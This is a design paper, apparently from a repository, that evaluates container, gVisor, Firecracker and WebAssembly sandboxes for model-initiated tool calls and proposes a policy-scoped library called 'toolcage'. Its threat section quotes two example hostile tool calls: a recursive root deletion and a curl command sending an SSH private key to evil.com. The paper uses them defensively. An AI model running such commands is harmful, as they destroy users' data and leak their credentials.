Cradicle Explorer

/ research / 2026-02-19-sandboxed-tool-execution.md
2026-02-19-sandboxed-tool-execution.md
  1  # Sandboxed Tool Execution for Open Models
  2  
  3  **Author:** Roman "Romanov" Research-Rachmaninov, #B4mad Industries
  4  **Date:** 2026-02-19
  5  **Bead:** beads-hub-42d
  6  
  7  ## Abstract
  8  
  9  Tool use is emerging as the critical capability gap between proprietary and open-source language models. Sebastian Raschka (Lex Fridman #490) identifies it as "the huge unlock" but flags trust as the barrier: unconstrained tool execution on a user's machine risks data destruction, exfiltration, and privilege escalation. This paper evaluates four sandboxing technologies — OCI containers, gVisor, Firecracker microVMs, and WebAssembly (WASM) — for isolating LLM-initiated tool calls. We propose a **security-scoped tool execution layer** that #B4mad can extract from OpenClaw as a standalone library, enabling any local open model to safely invoke tools.
 10  
 11  ## Context: Why This Matters for #B4mad
 12  
 13  OpenClaw already implements sandboxed execution: sub-agents run shell commands, edit files, and control browsers within a managed environment with policy-based access control. This capability is baked into the platform but not extractable. Meanwhile, the open-model ecosystem (Qwen, Llama, Mistral) is rapidly gaining function-calling abilities but lacks a standardized, secure execution runtime. There is a clear product opportunity: a lightweight, embeddable sandbox library that any inference framework (llama.cpp, vLLM, Ollama) can use to safely execute tool calls.
 14  
 15  ## The Trust Problem
 16  
 17  When an LLM generates a tool call like `exec("rm -rf /")` or `curl https://evil.com/exfil --data @~/.ssh/id_rsa`, the runtime must enforce:
 18  
 19  1. **Filesystem isolation** — restrict reads/writes to a scoped directory
 20  2. **Network policy** — block or allowlist outbound connections
 21  3. **Syscall filtering** — prevent privilege escalation, raw device access
 22  4. **Resource limits** — CPU, memory, time caps to prevent DoS
 23  5. **Capability scoping** — per-tool permission grants (this tool may read files but not write; that tool may make HTTP requests but only to api.example.com)
 24  
 25  ## Technology Evaluation
 26  
 27  ### 1. OCI Containers (Docker, Podman)
 28  
 29  **How it works:** Tool calls execute inside a container with a minimal filesystem, dropped capabilities, seccomp profiles, and network namespaces.
 30  
 31  | Aspect | Assessment |
 32  |--------|------------|
 33  | Startup latency | 200–500ms (cold), <100ms (warm with pool) |
 34  | Isolation strength | Good — namespace + cgroup + seccomp. Not a security boundary by default, but hardened configs (rootless, no-new-privileges, read-only rootfs) are strong |
 35  | Ecosystem maturity | Excellent — universal tooling, broad adoption |
 36  | Filesystem scoping | Bind-mount specific directories read-only or read-write |
 37  | Network control | `--network=none` or custom network policies |
 38  | Overhead | Low — shared kernel, minimal memory overhead |
 39  
 40  **Verdict:** Best default choice. Lowest friction, most mature, sufficient isolation for the threat model (untrusted LLM output, not adversarial kernel exploits).
 41  
 42  ### 2. gVisor (runsc)
 43  
 44  **How it works:** A user-space kernel that intercepts syscalls, providing an additional isolation layer on top of OCI containers. Used by Google Cloud Run.
 45  
 46  | Aspect | Assessment |
 47  |--------|------------|
 48  | Startup latency | 300–800ms |
 49  | Isolation strength | Excellent — syscall interception means container escapes require defeating both gVisor and the host kernel |
 50  | Ecosystem maturity | Good — drop-in OCI runtime replacement |
 51  | Compatibility | ~90% of Linux syscalls; some edge cases (io_uring, certain ioctls) fail |
 52  | Performance | 5–30% overhead on I/O-heavy workloads due to syscall interposition |
 53  
 54  **Verdict:** Strong choice when higher isolation is needed (e.g., executing code generated by untrusted models). The OCI compatibility means it's a runtime swap, not an architecture change.
 55  
 56  ### 3. Firecracker microVMs
 57  
 58  **How it works:** Lightweight VMs with a minimal VMM (Virtual Machine Monitor), booting a stripped Linux kernel in ~125ms. Used by AWS Lambda and Fly.io.
 59  
 60  | Aspect | Assessment |
 61  |--------|------------|
 62  | Startup latency | 125–200ms (impressive for a full VM) |
 63  | Isolation strength | Maximum — hardware virtualization boundary (KVM). Separate kernel instance |
 64  | Resource overhead | ~5MB memory for the VMM; guest kernel adds ~20–40MB |
 65  | Ecosystem maturity | Moderate — requires KVM, custom rootfs images, API-driven lifecycle |
 66  | Complexity | High — snapshot/restore helps latency but adds operational complexity |
 67  
 68  **Verdict:** Overkill for most tool calls but appropriate for high-risk operations (arbitrary code execution, untrusted plugins). The snapshot/restore pattern could pre-warm VMs for sub-100ms cold starts.
 69  
 70  ### 4. WebAssembly (WASM) Sandboxes
 71  
 72  **How it works:** Tool implementations compiled to WASM run in a sandboxed runtime (Wasmtime, WasmEdge) with capability-based security (WASI).
 73  
 74  | Aspect | Assessment |
 75  |--------|------------|
 76  | Startup latency | <1ms (near-instant) |
 77  | Isolation strength | Very good — linear memory model, no raw syscalls, capability-based I/O |
 78  | Ecosystem maturity | Growing but incomplete — WASI preview 2 still stabilizing; not all tools can be compiled to WASM |
 79  | Language support | Rust, C/C++, Go (via TinyGo), Python (via componentize-py, limited) |
 80  | Limitation | Cannot run arbitrary shell commands; tools must be purpose-built as WASM components |
 81  
 82  **Verdict:** Ideal for a curated tool catalog (file operations, HTTP clients, parsers) but cannot sandbox arbitrary shell execution. Complementary to container-based approaches.
 83  
 84  ## Proposed Architecture: `toolcage`
 85  
 86  We propose a library called **`toolcage`** (working name) with the following design:
 87  
 88  ```
 89  ┌─────────────────────────────────────┐
 90  │         Inference Runtime           │
 91  │  (Ollama / vLLM / llama.cpp)        │
 92  │                                     │
 93  │  Model generates: tool_call(...)    │
 94  │         │                           │
 95  │         ▼                           │
 96  │  ┌─────────────┐                    │
 97  │  │  toolcage   │  ← policy engine   │
 98  │  │  library    │  ← sandbox manager │
 99  │  └──────┬──────┘                    │
100  │         │                           │
101  └─────────┼───────────────────────────┘
102            │
103            ▼
104  ┌─────────────────────┐
105  │   Sandbox Backend    │
106  │  ┌───┐ ┌───┐ ┌───┐  │
107  │  │OCI│ │gVi│ │WAS│  │
108  │  │   │ │sor│ │M  │  │
109  │  └───┘ └───┘ └───┘  │
110  └─────────────────────┘
111  ```
112  
113  ### Core Concepts
114  
115  1. **Tool Registry** — each tool declares its capabilities: filesystem paths, network endpoints, max execution time, required syscalls
116  2. **Policy Engine** — a TOML/YAML policy file maps tools to allowed capabilities, similar to OpenClaw's existing tool policies
117  3. **Sandbox Backend** — pluggable: OCI (default), gVisor (hardened), Firecracker (maximum), WASM (for built-in tools)
118  4. **Result Extraction** — structured output capture (stdout/stderr/exit code/files) with size limits
119  
120  ### Example Policy
121  
122  ```toml
123  [tool.web_fetch]
124  backend = "oci"
125  network = ["allowlist:api.example.com:443"]
126  filesystem = "none"
127  timeout = "30s"
128  memory = "128MB"
129  
130  [tool.code_execute]
131  backend = "gvisor"
132  network = "none"
133  filesystem = { writable = ["/workspace"], readable = ["/data"] }
134  timeout = "60s"
135  memory = "512MB"
136  
137  [tool.file_edit]
138  backend = "wasm"
139  filesystem = { writable = ["/workspace/project"] }
140  network = "none"
141  timeout = "10s"
142  ```
143  
144  ### Integration Points
145  
146  - **Ollama:** Post-generation hook that intercepts tool calls before execution
147  - **vLLM:** Custom tool executor callback in the serving layer
148  - **llama.cpp:** Function call handler in the server mode
149  - **OpenClaw:** Replace the current exec subsystem with toolcage for consistency
150  
151  ## Competitive Landscape
152  
153  | Project | Approach | Gap |
154  |---------|----------|-----|
155  | OpenAI Code Interpreter | Proprietary sandbox | Not available locally |
156  | E2B.dev | Cloud-hosted sandboxes | Requires network round-trip; not local-first |
157  | Modal | Serverless containers | Cloud-only; not embeddable |
158  | Daytona | Dev environment sandboxes | Full workspace, not per-tool-call scoped |
159  | **toolcage** (proposed) | **Local, per-call, policy-scoped** | **Does not exist yet** |
160  
161  The key differentiator: **toolcage** would be the first local-first, embeddable, per-tool-call sandbox with declarative security policies.
162  
163  ## Recommendations
164  
165  1. **Start with OCI + rootless Podman** as the default backend. It's available everywhere, well-understood, and sufficient for the primary threat model.
166  
167  2. **Implement the policy engine first** — this is the real value. The sandbox backend is pluggable; the security model is the product.
168  
169  3. **Ship as a Go or Rust library with a CLI wrapper** — embeddable in inference runtimes but also usable standalone (`toolcage exec --policy tools.toml -- python script.py`).
170  
171  4. **Contribute to the MCP (Model Context Protocol) ecosystem** — Anthropic's MCP is becoming the standard for tool definitions. A toolcage MCP server that wraps any tool in a sandbox would have immediate adoption.
172  
173  5. **Extract from OpenClaw incrementally** — OpenClaw's exec subsystem already solves this problem. Factor out the sandbox and policy layers as a library, then have OpenClaw depend on it.
174  
175  6. **Publish as open source** — this positions #B4mad as a thought leader in secure local AI infrastructure, driving adoption toward the broader OpenClaw platform.
176  
177  ## Risk Assessment
178  
179  | Risk | Likelihood | Mitigation |
180  |------|-----------|------------|
181  | Container escape via kernel exploit | Low | gVisor/Firecracker backends for high-risk tools |
182  | Policy misconfiguration allows exfiltration | Medium | Deny-by-default; require explicit allowlists; lint policies |
183  | Performance overhead kills UX | Medium | Container pooling; WASM for lightweight tools; warm caches |
184  | Ecosystem moves to cloud-only sandboxes | Low | Local-first is a strong counter-position for privacy-conscious users |
185  
186  ## References
187  
188  1. Raschka, S. (2026). Interview on Lex Fridman Podcast #490, "AI State of the Art 2026." ~32:54 timestamp discussing tool use and containerization.
189  2. Google gVisor Project. https://gvisor.dev/
190  3. AWS Firecracker. https://firecracker-microvm.github.io/
191  4. WebAssembly System Interface (WASI). https://wasi.dev/
192  5. Anthropic Model Context Protocol (MCP). https://modelcontextprotocol.io/
193  6. E2B.dev — Open-source cloud sandboxes for AI. https://e2b.dev/
194  7. Open Containers Initiative (OCI) Runtime Specification. https://opencontainers.org/
195  
196  ---
197  
198  *This paper was produced by Romanov (Research-Rachmaninov) for #B4mad Industries. Filed under bead beads-hub-42d.*